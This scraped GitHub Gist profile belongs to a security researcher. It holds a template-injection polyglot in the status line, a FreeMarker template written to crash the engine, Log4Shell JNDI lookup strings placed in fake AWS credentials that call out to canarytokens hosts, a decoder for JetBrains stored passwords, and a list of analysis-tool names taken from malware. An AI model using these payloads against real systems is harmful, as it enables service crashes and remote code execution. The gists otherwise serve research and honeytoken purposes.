Skip to content

Instantly share code, notes, and snippets.

View Plazmaz's full-sized avatar
👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x

Dylan Katz Plazmaz

👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x
228 followers · 30 following
View GitHub Profile
@Plazmaz
Plazmaz / 2019-05-06-example-post.md
Last active June 25, 2019 16:16
Jekyll Metadata Generator

This Is a Post Title!

This is an example post. I really like this post because it is fake and that's cool.

@Plazmaz
Plazmaz / keybase.md
Created August 5, 2019 20:21

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo

To claim this, I am signing this object:

@Plazmaz
Plazmaz / list.txt
Created September 29, 2019 18:44
A list of debugging/AV/developer tools extracted from malware
cis.exe
cmdvirth.exe
alive.exe
filewatcherservice.exe
ngvmsvc.exe
sandboxierpcss.exe
analyzer.exe
fortitracer.exe
nsverctl.exe
sbiectrl.exe
@Plazmaz
Plazmaz / jetbrains_encoding.py
Created November 7, 2019 04:53
This is what JetBrains uses(used?) for encoding webServers.xml and other configs
# Source file:
# http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD
# PasswordUtil.decodePassword
def decode_jebtrains(encoded):
out = ''
for i in range(0, len(encoded), 4):
out += chr(int(encoded[i:i+4], 16) ^ 57258)
return out
# PasswordUtil.encodePassword
@Plazmaz
Plazmaz / freemarker-billion.ftl
Last active November 20, 2019 20:37
FreeMarker Billion Laughs
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
@Plazmaz
Plazmaz / config.yml
Created January 24, 2020 01:28
notify:
- type: email
properties:
host: ""
host_user: ""
host_pass: ""
port: 587
use_tls: True
from: ""
enabled: false
@Plazmaz
Plazmaz / annotated-vbs-dropper.vbs
Last active January 2, 2021 09:37
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB
@Plazmaz
Plazmaz / netcat-webserver.sh
Last active May 7, 2021 02:08
A one-liner for a netcat webserver w/ sane logging
#! /bin/bash
sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done'
# Original (no sudo):
# while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80 |egrep -v "Accept" |egrep -v "Content-Length" |egrep -v "Host" |egrep -vi "cache"; done
# Raw (Skip filtering header lines):
# sudo bash -c 'while true; do echo "HTTP/1.1 200 OK\n\n" |nc -l -p 80; done'
@Plazmaz
Plazmaz / a.sh
Last active December 12, 2021 21:05
${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
AWS_ACCESS_KEY_ID=${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
AWS_SECRET_ACCESS_KEY=7638792F423F4528482B4B6250655368566D597133743677397A24432646294A404E635166546A576E5A7234753778214125442A472D4B6150645367556B5870${jndi:ldap://x${hostName}.L4J.itkyt8sp20uipz73hfob7x8xt.canarytokens.com/skey}
# AWS Credentials file
[${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}]
aws_access_key_id = yLryKGwcGc3ez9G8YAnjeYMQOc${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} # Informative, can't be used alone
aws_secret_access_key = nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}
@Plazmaz
Plazmaz / all-chrome-extensions.txt
Last active March 18, 2022 21:05
Update: This file was limited by upload size! Please see https://github.com/Plazmaz/every-chrome-extension for the full list and scraping tool
https://chrome.google.com/webstore/detail/%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D1%81%D0%BA%D0%B8%D0%B5-%D1%81%D1%82%D0%B8%D0%BA%D0%B5%D1%80%D1%8B-%D0%B1%D0%B5%D1%81%D0%BA%D0%BE%D0%BD%D0%B5/aoaagafllhniocophalnomgfmolofkko
https://chrome.google.com/webstore/detail/senscritique/nofmkkmhgjhhhilmilkcamnkbjhpkfen
https://chrome.google.com/webstore/detail/wambli-wiconi-tipi-db-sit/caldolanelnbbloogdldjcjcpeidfngc
https://chrome.google.com/webstore/detail/piscine-iasi/hgnfahakmadogmfpbmfmnonciegelngl
https://chrome.google.com/webstore/detail/chouti-enhance/pdllnllndjpgeklihnlgeloknebkepeb
https://chrome.google.com/webstore/detail/ezshopper/bnkdkedkdoaniknfocfonneflokdimcm
https://chrome.google.com/webstore/detail/ptysh/kpioedflaimmieepoconfikagbjclojh
https://chrome.google.com/webstore/detail/dussenberg-model-j-tab/dcaijaamhndclgifjelncejelokpcpdn
https://chrome.google.com/webstore/detail/balance/lflebgnjdhlmnedagbeildjbagfllhie
https://chrome.google.com/webstore/detail/mecha-khaxis/iepfbkljfaoegagfeeiklcdcennadiei